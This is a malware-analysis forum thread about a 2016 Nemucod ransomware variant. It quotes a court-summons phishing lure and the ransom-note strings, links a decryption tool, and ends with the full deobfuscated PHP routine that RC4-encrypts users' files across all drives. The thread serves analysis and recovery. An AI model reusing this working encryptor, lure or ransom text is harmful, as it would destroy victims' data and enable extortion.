A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28339  by maddog4012
 Mon Apr 18, 2016 4:35 pm
came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext
You do not have the required permissions to view the files attached to this post.
 #28390  by parviz
 Mon Apr 25, 2016 5:39 am
maddog4012 wrote:came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext
can't find password
 #28400  by TETYYSs
 Mon Apr 25, 2016 11:47 am
parviz wrote: can't find password
protip: it's on current page you're viewing
 #28440  by Antelox
 Sun May 01, 2016 8:40 pm
In attachment the archive which contain the original email's attachment.

I wrote simple python scripts to extract the key and recover the files infected by this last Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox
You do not have the required permissions to view the files attached to this post.
 #29709  by xors
 Mon Dec 12, 2016 9:45 pm
Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings
Code: Select all
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

You do not have the required permissions to view the files attached to this post.
 #29712  by Antelox
 Tue Dec 13, 2016 7:32 am
xors wrote:Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings
Code: Select all
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses the RC4 encryption; The deobfuscated script below:
Code: Select all
<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox